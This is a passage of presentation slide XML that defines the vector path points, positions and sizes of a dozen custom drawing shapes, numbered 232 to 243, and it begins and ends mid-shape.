                <a:lnTo>
                  <a:pt x="43" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>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444" name="CustomShape 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604960" y="4006800"/>
            <a:ext cx="58320" cy="14040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="9">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="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45" name="CustomShape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604960" y="3967200"/>
            <a:ext cx="58320" cy="17280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="11">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:move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6" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>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46" name="CustomShape 234"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660760" y="3949560"/>
            <a:ext cx="96480" cy="177480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="61" h="112">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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447" name="CustomShape 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2708280" y="3908520"/>
            <a:ext cx="124920" cy="23400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="79" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>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448" name="CustomShape 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637000" y="4130640"/>
            <a:ext cx="209160" cy="70920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="45">
                <a:moveTo>
                  <a:pt x="55" y="43"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="28"/>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29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="4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49" name="CustomShape 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592360" y="4149720"/>
            <a:ext cx="213840" cy="63000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="135" h="40">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5"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0" name="CustomShape 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629080" y="4141800"/>
            <a:ext cx="209160" cy="55080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="35">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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1" name="CustomShape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="4143240"/>
            <a:ext cx="210600" cy="61560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="133" h="39">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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2" name="CustomShape 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2563920" y="3409920"/>
            <a:ext cx="394920" cy="331560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249" h="209">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="2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3" name="CustomShape 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701800" y="3433680"/>
            <a:ext cx="124920" cy="144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="79" h="91">
                <a:moveTo>
                  <a:pt x="78" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="3"/>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454" name="CustomShape 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714760" y="3475080"/>
            <a:ext cx="209160" cy="142560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="90">
                <a:moveTo>
                  <a:pt x="1" y="67"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="67"/>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55" name="CustomShape 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2689200" y="3614760"/>
            <a:ext cx="151920" cy="48960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="96" h="31">
                <a:moveTo>
                  <a:pt x="96" y="11"/>
                </a:moveTo>
